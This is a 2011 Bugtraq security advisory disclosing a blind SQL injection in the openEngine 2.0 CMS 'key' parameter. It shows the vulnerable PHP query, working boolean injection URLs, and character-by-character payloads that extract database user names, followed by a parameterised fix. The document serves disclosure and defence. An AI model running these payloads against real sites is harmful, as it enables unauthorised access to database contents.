[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
openEngine 2.0 'key' Blind SQL Injection vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: openEngine 2.0 'key' Blind SQL Injection vulnerability
- From: sschurtz@xxxxxxxxxxx
- Date: Sun, 9 Oct 2011 09:34:24 GMT
Advisory: openEngine 2.0 'key' Blind SQL Injection vulnerability
Advisory ID: SSCHADV2011-026
Author: Stefan Schurtz
Affected Software: Successfully tested on openEngine 2.0 100226
Vendor URL: http://www.openengine.de/
Vendor Status: informed
CVE-ID: -
==========================
Vulnerability Description
==========================
The 'key' parameter in openEngine 2.0 is prone to a Blind SQL Injection
==================
Technical Details
==================
# vul code in 'openengine/cms/system/02_page/includes/admin.php'
$query = "SELECT * FROM ".$db_praefix."page WHERE (page_key = $page_key) AND
(page_status <= ".$account_status.") $access";
==================
Exploit
==================
# Database information
User: easy
# Blind SQL Injection
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=2 ->
"Sie m?chten die Seite versenden."
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=1 ->
"Sie m?chten die Seite Homepage (de) versenden."
# User-Guessing
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR
ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM
information_schema.USER_PRIVILEGES LIMIT 4,1),2,1)) = 101
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR
ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM
information_schema.USER_PRIVILEGES LIMIT 4,1),3,1)) = 97
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR
ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM
information_schema.USER_PRIVILEGES LIMIT 4,1),4,1)) = 115
http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR
ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM
information_schema.USER_PRIVILEGES LIMIT 4,1),5,1)) = 121
=========
Solution
=========
$query = sprintf("SELECT * FROM ".$db_praefix."page WHERE (page_key = %d) AND
(page_status <= ".$account_status.") $access;",$page_key);
====================
Disclosure Timeline
====================
08-Oct-2011 - informed developers
08-Oct-2011 - release date of this security advisory
========
Credits
========
Vulnerability found and advisory written by Stefan Schurtz.
===========
References
===========
http://www.openengine.de/
http://www.rul3z.de/advisories/SSCHADV2011-026.txt
http://www.rul3z.de/advisories/SSCHADV2011-019.txt